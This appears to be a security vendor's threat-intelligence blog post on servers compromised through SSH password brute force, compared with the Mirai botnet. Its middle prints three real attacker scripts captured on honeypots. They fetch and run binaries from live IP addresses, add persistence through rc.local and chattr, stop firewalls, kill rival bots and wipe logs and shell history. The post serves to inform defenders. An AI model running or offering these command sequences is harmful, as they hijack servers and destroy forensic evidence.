In the last few days, we heard a lot about the Mirai Internet-of-Things botnet, which caused a DDoS attack against Dyn. But Mirai is a relatively small botnet because the majority of consumer IoT devices are located behind home routers and cannot be easily accessed from the Internet even if they are vulnerable. Also these devices have relatively limited CPU power and bandwidth.

On the horizon we can see a much bigger problem with compromised servers in data centers. Nowadays decent VPS or KVM hosting has become very cheap, and it starts at about $5 per month. For that money customers have a server with a dedicated IP address. It’s affordable and convenient for many purposes: web hosting, VPN server, cloud storage, mail servers, torrents, git, games, or just for fun. Basic knowledge of the OS is enough for the initial setup and anybody can own an Internet connected server. Making such a server fully secure is a different story. When you sign up for a free email service or social network, you will see suggestions about how to set a strong password and why you need two factor authentication. But if you have your own server, nobody will warn you and take care of the security of your server. Attackers will  find ways to take control of the server and will start using it for their own purposes. In this case we are not talking about little IoT devices or even PCs, but servers with server grade OS and a reliable 24/7 Internet connection.

At Cyphort, we continuously monitor our “deception“ network which contains specially configured vulnerable servers. In most cases, attackers use vulnerabilities in web frameworks or weak passwords to compromise servers.

Basic scenario of SSH weak password attack:

  1. Find IP addresses with Internet accessible SSH service
  2. Brute force password
  3. Log in
  4. Download agent or put it through SSH stream
  5. Set execution attributes
  6. Bot execution
  7. Setup persistence: setup init scripts, crond job, or replace system binaries
  8. Clean up command history and other evidence of penetration

 

When the bot is installed, attackers can do anything with this server. From our observation, most activities are related to targeted DDoS attacks, ad fraud, and sending phishing emails. Also, attackers are frequently using compromised servers as an alternative to TOR for traffic anonymization.

It’s hard to tell how many servers are compromised out there and can be used in coordinated DDoS attacks. We suppose the bandwidth of attack from compromised servers to be much bigger than the bandwidth of attack from compromised IoT devices.

Cyphort’s deception network collected a list of the most frequently used passwords for ssh brute force attacks.

If a server is exposed to the Internet and one of these passwords is used for ssh access, the server will be compromised in a matter of hours.

Here are examples of scripts which attackers execute after log in:

Example 1:

apt-get install curl

yum install curl

curl http://121.40.175.22:15651/95 -o /tmp/gfty

killall -I -q Linux6 ifconf 123

killall -I -q LAdmins Admins asxper

killall -I -q g251 koiu winsx synlinshi

killall -I -q mysql sysyang ifconfigethO whoami ifconfigetho

killall -I -q gmetad cvn hanx .xdsy hssa ggu ggy gg azda .sshd bashpa

killall -I -q sshpa udevd .SSH2 .SSHH2 nhgbhhj zl pro proh DDos64 DDos32

killall -I -q dos64 dos32 sfewfesfs sfewfesfsh IptabLes tangwe IptabLex

killall -I -q .IptabLes .IptabLex 1 perl System Admins Linuxsys System32 rus

killall -I -q sql tel netstat -an ddos32_64.64 Admins koiu 315 64 udp

killall -I -q koi Chinesepoli 508 topsing weige udp

apt-get install wget

yum install wget

wget -c -O /tmp/gfty http://121.40.175.22:15651/95

chmod 0755 /tmp/gfty

/tmp/gfty

./gfty

nohup /tmp/gfty > /dev/null 2>&1 &

echo “service gfty”>>/etc/rc.local

echo “/tmp/gfty”>>/etc/rc.local

chattr +i /tmp/gfty

apt-get -y remove curl

yum -y remove curl

apt-get -y remove wget

yum -y remove wget

clear

history -c

 

Example 2:

cd /tmp

service iptables stop

rm -rf /etc/crontab

rm -rf /usr/bin/bsd-port/getty

rm -rf /usr/bin/bsd-port/*

killall -9 getty

find ./ -name “S90*” | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -fr

ps -ef | grep -v ‘ssh’ |awk ‘{if ($3 == 1) print $2}’ | xargs kill -9

yum -y install wget

wget -c http://222.186.34.174:9655/aa

chmod 777 aa

./aa

wget -c http://222.186.34.174:9655/17230

chmod 777 17230

./17230

iptables -I INPUT -s 116.31.123.159 -j DROP

iptables -I INPUT -s 183.60.110.74 -j DROP

iptables -I INPUT -s 122.224.32.32 -j DROP

iptables -I INPUT -s 149.56.107.161 -j DROP

iptables -I INPUT -s 104.223.10.48 -j DROP

iptables -I INPUT -s 178.170.68.69 -j DROP

iptables -I INPUT -s 158.69.219.235 -j DROP

iptables -I INPUT -s 164.132.170.78 -j DROP

iptables -I INPUT -s 149.202.219.49 -j DROP

iptables -I INPUT -s 124.16.31.156 -j DROP

iptables -I INPUT -s 183.61.171.149 -j DROP

iptables -I INPUT -s 61.157.167.74 -j DROP

iptables -I INPUT -s 119.63.44.35 -j DROP

iptables -I INPUT -s 42.51.23.80 -j DROP

iptables -I INPUT -s 104.129.35.178 -j DROP

iptables -I INPUT -s 103.31.240.133 -j DROP

iptables -I INPUT -s 100.42.227.29 -j DROP

iptables -I INPUT -s 107.160.46.234 -j DROP

iptables -I INPUT -s 222.186.34.73 -j DROP

iptables -I INPUT -s 36.249.123.134 -j DROP

iptables -I INPUT -s 118.193.214.160 -j DROP

iptables -I INPUT -s 104.37.213.35 -j DROP

iptables -I INPUT -s 58.54.39.51 -j DROP

iptables -I INPUT -s 23.247.5.12 -j DROP

iptables -I INPUT -s 23.247.5.11 -j DROP

iptables -I INPUT -s 51.255.84.218 -j DROP

iptables -I INPUT -s 98.126.8.114 -j DROP

iptables -I INPUT -s 222.174.5.13 -j DROP

iptables -I INPUT -s 123.184.16.119 -j DROP

iptables -I INPUT -s 103.214.169.184 -j DROP

iptables -I INPUT -s 103.236.220.90 -j DROP

iptables -I INPUT -s 103.55.25.57 -j DROP

iptables -I INPUT -s 103.55.26.91 -j DROP

iptables -I INPUT -s 104.223.6.159 -j DROP

iptables -I INPUT -s 107.160.46.234 -j DROP

iptables -I INPUT -s 111.160.17.8 -j DROP

iptables -I INPUT -s 114.112.27.83 -j DROP

iptables -I INPUT -s 115.231.219.34 -j DROP

iptables -I INPUT -s 115.28.206.48 -j DROP

iptables -I INPUT -s 116.31.116.28 -j DROP

iptables -I INPUT -s 117.18.4.110 -j DROP

iptables -I INPUT -s 122.225.102.131 -j DROP

iptables -I INPUT -s 123.184.16.119 -j DROP

iptables -I INPUT -s 14.29.47.15 -j DROP

iptables -I INPUT -s 149.202.210.93 -j DROP

iptables -I INPUT -s 180.97.163.228 -j DROP

iptables -I INPUT -s 183.60.0.0/24 -j DROP

iptables -I INPUT -s 183.60.110.83 -j DROP

iptables -I INPUT -s 183.60.149.196 -j DROP

iptables -I INPUT -s 183.60.149.199 -j DROP

iptables -I INPUT -s 183.61.171.147 -j DROP

iptables -I INPUT -s 198.44.177.102 -j DROP

iptables -I INPUT -s 204.44.67.19 -j DROP

iptables -I INPUT -s 23.234.25.143 -j DROP

iptables -I INPUT -s 23.234.28.85 -j DROP

iptables -I INPUT -s 51.255.66.195 -j DROP

iptables -I INPUT -s 58.218.200.111 -j DROP

iptables -I INPUT -s 61.160.195.78 -j DROP

iptables -I INPUT -s 61.174.49.203 -j DROP

iptables -I INPUT -s 66.102.253.30 -j DROP

iptables -I INPUT -s 66.249.65.123 -j DROP

iptables -I INPUT -s 115.231.17.7 -j DROP

iptables -I INPUT -s 61.174.49.203 -j DROP

echo> /var/log/wtmp

echo> /root/bash_history

echo> /var/log/syslog

echo> /var/log/messages

echo> /var/log/httpd/access_log

echo> /var/log/httpd/error_log

echo> /var/log/xferlog

echo> /var/log/secure

echo> /var/log/auth.log

echo> /var/log/user.log

echo> /var/log/wtmp

echo> /var/log/lastlog

echo> /var/log/btmp

echo> /var/run/utmp

history -c

exit

Example 3:

/etc/init.d/iptables stop

service iptables stop

SuSEfirewall2 stop

reSuSEfirewall2 stop

iptables -F

/etc/init.d/iptables stop

service iptables stop

SuSEfirewall2 stop

reSuSEfirewall2 stop

iptables -F

/etc/init.d/iptables stop

service iptables stop

SuSEfirewall2 stop

reSuSEfirewall2 stop

iptables -F

chattr -i /usr/bin/wget

chmod 755 /usr/bin/wget

wget -P /bin/ http://43.230.144.65/zz -c

chmod 0755 /bin/zz

nohup /bin/zz > /dev/null 2>&1 &

chattr +i /usr/bin/wget

chmod 0 /usr/libexec/openssh/sftp-server

chattr +i /usr/libexec/openssh/sftp-server

echo ‘ ‘ > /var/log/wtmp

echo ‘ ‘ > /var/log/lastlog

echo ‘ ‘ > /var/log/messages

export HISTFILE=/dev/null

rm -f /var/log/wtmp

rm -f .bash_history

history -c

 

For now most hosting and cloud providers are not ready to spend money on detecting bots and malicious activity on their servers. It’s a very competitive global market and nobody wants to incur additional expenses. Developers of IoT devices are also not ready to spend time and money on security. It’s also a global market and it’s important to release products as fast as possible and as cheap as possible. End users of devices and servers are not creating significant demand to enhance security because most of them are not loosing money directly and compromised IoT devices may continue to work as usual.

On the other side, advertising companies are forced to invent new techniques to distinguish between real people and click bots which requires many servers. Other companies have to spend some of their budget for anti-DDoS solutions and a backup infrastructure that again requires many servers. All of these companies need access to cheap, reliable servers with a good internet connection…I guess you see my point.